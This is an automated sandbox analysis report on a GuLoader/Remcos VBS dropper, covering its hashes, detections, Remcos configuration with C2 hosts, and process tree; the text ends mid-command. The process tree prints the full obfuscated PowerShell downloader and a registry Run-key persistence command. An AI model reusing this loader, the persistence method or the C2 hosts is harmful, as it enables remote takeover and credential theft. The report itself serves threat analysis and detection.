guloader | 1d6d63b8901bc80a11efb209bf189620b2ba252e80138564224e6ad3ece199ae

Analysis

max time kernel
151s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
23-05-2024 01:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d6d63b8901bc80a11efb209bf189620b2ba252e80138564224e6ad3ece199ae.vbs
Size

14KB
MD5

cc0d3bd0295d7e43b783d4a0c36ca3e7
SHA1

c995bccdd522edc92374da5f8dba5fbbb702d8c5
SHA256

1d6d63b8901bc80a11efb209bf189620b2ba252e80138564224e6ad3ece199ae
SHA512

3772f7ac137307c3a3380b6b5c316bd62a07d2aab162650cfead07ed660cd2971220f7d5d88d2db25c122143c6c921991cc899381d5c7c1c078cda819fbf33d2
SSDEEP

192:pmZrDl6E84tSjHVq6UyG+Z0tw/uWhq/V0rXCeVE6pW9CAhlxy4fnp:cBvzCHVqD+Z0tw/uWkNiXC74kD7xjfnp

Score

10^/10

guloader remcos uju work cloudeye 2024 collection downloader persistence rat

Malware Config

Extracted

Family

remcos

Botnet

UJU WORK CLOUDEYE 2024

myfrontmannysix.ddns.net:4939

backupfrontmanny.duckdns.org:4939

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
ioul.exe
copy_folder
uiyk
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-JTLOM3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/780-46-0x0000000001080000-0x00000000022D4000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Detects executables built or packed with MPress PE compressor 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1624-54-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3456-55-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/1656-56-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/1656-58-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3456-57-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/1624-59-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3456-61-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/1656-60-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/1624-62-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/780-74-0x000000001F900000-0x000000001F919000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/780-78-0x000000001F900000-0x000000001F919000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/780-77-0x000000001F900000-0x000000001F919000-memory.dmp	INDICATOR_EXE_Packed_MPress

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3456-61-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3456-61-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/3456-61-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/1624-62-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3456-61-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1656-60-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1624-62-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 3092 powershell.exe

flow	pid	process
8	3092	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Slidfladerne = "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\\Rewets\\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

780 wab.exe
780 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2004 powershell.exe
780 wab.exe

pid	process
780	wab.exe
780	wab.exe

pid	process
2004	powershell.exe
780	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 2004 set thread context of 780	2004	powershell.exe	wab.exe
PID 780 set thread context of 1624	780	wab.exe	wab.exe
PID 780 set thread context of 3456	780	wab.exe	wab.exe
PID 780 set thread context of 1656	780	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1612 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4748 PING.EXE

pid	process
1612	reg.exe

pid	process
4748	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exe

pid	process
3092	powershell.exe
3092	powershell.exe
2004	powershell.exe
2004	powershell.exe
2004	powershell.exe
2004	powershell.exe
1624	wab.exe
1624	wab.exe
1656	wab.exe
1656	wab.exe
1624	wab.exe
1624	wab.exe

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exewab.exe

pid process

2004 powershell.exe
780 wab.exe
780 wab.exe
780 wab.exe
780 wab.exe
780 wab.exe
780 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 3092 powershell.exe
Token: SeDebugPrivilege 2004 powershell.exe
Token: SeDebugPrivilege 1656 wab.exe

pid	process
2004	powershell.exe
780	wab.exe
780	wab.exe
780	wab.exe
780	wab.exe
780	wab.exe
780	wab.exe

description	pid	process
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	1656	wab.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1704 wrote to memory of 948	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 948	1704	WScript.exe	cmd.exe
PID 948 wrote to memory of 4748	948	cmd.exe	PING.EXE
PID 948 wrote to memory of 4748	948	cmd.exe	PING.EXE
PID 1704 wrote to memory of 3092	1704	WScript.exe	powershell.exe
PID 1704 wrote to memory of 3092	1704	WScript.exe	powershell.exe
PID 3092 wrote to memory of 1648	3092	powershell.exe	cmd.exe
PID 3092 wrote to memory of 1648	3092	powershell.exe	cmd.exe
PID 3092 wrote to memory of 2004	3092	powershell.exe	powershell.exe
PID 3092 wrote to memory of 2004	3092	powershell.exe	powershell.exe
PID 3092 wrote to memory of 2004	3092	powershell.exe	powershell.exe
PID 2004 wrote to memory of 3180	2004	powershell.exe	cmd.exe
PID 2004 wrote to memory of 3180	2004	powershell.exe	cmd.exe
PID 2004 wrote to memory of 3180	2004	powershell.exe	cmd.exe
PID 2004 wrote to memory of 780	2004	powershell.exe	wab.exe
PID 2004 wrote to memory of 780	2004	powershell.exe	wab.exe
PID 2004 wrote to memory of 780	2004	powershell.exe	wab.exe
PID 2004 wrote to memory of 780	2004	powershell.exe	wab.exe
PID 2004 wrote to memory of 780	2004	powershell.exe	wab.exe
PID 780 wrote to memory of 1620	780	wab.exe	cmd.exe
PID 780 wrote to memory of 1620	780	wab.exe	cmd.exe
PID 780 wrote to memory of 1620	780	wab.exe	cmd.exe
PID 1620 wrote to memory of 1612	1620	cmd.exe	reg.exe
PID 1620 wrote to memory of 1612	1620	cmd.exe	reg.exe
PID 1620 wrote to memory of 1612	1620	cmd.exe	reg.exe
PID 780 wrote to memory of 1624	780	wab.exe	wab.exe
PID 780 wrote to memory of 1624	780	wab.exe	wab.exe
PID 780 wrote to memory of 1624	780	wab.exe	wab.exe
PID 780 wrote to memory of 1624	780	wab.exe	wab.exe
PID 780 wrote to memory of 3952	780	wab.exe	wab.exe
PID 780 wrote to memory of 3952	780	wab.exe	wab.exe
PID 780 wrote to memory of 3952	780	wab.exe	wab.exe
PID 780 wrote to memory of 3284	780	wab.exe	wab.exe
PID 780 wrote to memory of 3284	780	wab.exe	wab.exe
PID 780 wrote to memory of 3284	780	wab.exe	wab.exe
PID 780 wrote to memory of 3932	780	wab.exe	wab.exe
PID 780 wrote to memory of 3932	780	wab.exe	wab.exe
PID 780 wrote to memory of 3932	780	wab.exe	wab.exe
PID 780 wrote to memory of 3456	780	wab.exe	wab.exe
PID 780 wrote to memory of 3456	780	wab.exe	wab.exe
PID 780 wrote to memory of 3456	780	wab.exe	wab.exe
PID 780 wrote to memory of 3456	780	wab.exe	wab.exe
PID 780 wrote to memory of 1656	780	wab.exe	wab.exe
PID 780 wrote to memory of 1656	780	wab.exe	wab.exe
PID 780 wrote to memory of 1656	780	wab.exe	wab.exe
PID 780 wrote to memory of 1656	780	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1d6d63b8901bc80a11efb209bf189620b2ba252e80138564224e6ad3ece199ae.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
2⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
3⤵
- Runs ping.exe
PID:4748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan ');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"
3⤵
PID:1648

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Undialyzeds = 1;$Forespeech='Sub';$Forespeech+='strin';$Forespeech+='g';Function Mikado($Firebolted){$Martyrologic=$Firebolted.Length-$Undialyzeds;For($Femalizes49=7;$Femalizes49 -lt $Martyrologic;$Femalizes49+=8){$Trompetdyrenes+=$Firebolted.$Forespeech.Invoke( $Femalizes49, $Undialyzeds);}$Trompetdyrenes;}function Xylyl($nougats){. ($Sprinklervsken) ($nougats);}$Guilts=Mikado 'MisbirtMm alretoOblongiz MustafiEnglevilAfkol,nl Larigoa.alteri/Metagna5 Stab.l. egions0Asbku,h Untaun.(BelejriWAssociaiUdviklin bagestdRutscheoGejstliwSagsgansBlokpol IndonesNLaboratTo forme L.isure1,ladtan0 Ran.or.Apertne0rodknol;Sultegr algesi.W S,riveiAddi,ten Lin eb6Do.atio4Elaph.d;St.vnsb Enc,untxSeed ng6 ,ogica4Adiposi;Kvindes FutilizrRugbrdsv Transi: Nongol1Bun tsd2 Denoun1Bortdmm. Me,red0Opkalds)Delites arbejdsGPalaeogeArchesic,ekognoktkkendeoUpassel/Rouil.e2Spirant0Photote1Slutpun0eftertr0 Stumbl1Hu dehu0Recitat1Hjlpe,n elsenfFGossa ei SimultrUberegneIndeksefWharfraoAftalevx To.sio/Forvalt1Painles2Drivers1I,dsmig.Cocksho0Tantiem ';$Fuldbragtes=Mikado ' ImerinUForegris Redeareti.balerJunkboa-Bon.sesACatchm gSi kerheModer,inForrykttPletter ';$Spinituberculate=Mikado ' BrndemhIndividtindsendt BankospPau,eris.nnovat:Balleti/Fossaeu/V,lfundc Al inaa OddlegdKostskoeBlokadenSeend saAmatrskdCult kle GummibrOrangeaeO,tendegBogiemaaNy etipl.ositiooCardioms.envisn.Debtorsc GravhjoNonpuebm Endoph/Ti,glysTKlbebaaoMisderiicarcasslAdresseeFilmogrtSemicelp Fil,inaSjlsr.apEkspedii .aabenr Ol,gis.Rooti.rdRispendeHumpssaptevarmel Geestso LgnersyInbitsb>Universh,ogonghtSy,kemat An,etlp Chempa:Kommpre/ Melipo/ Anderum HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc 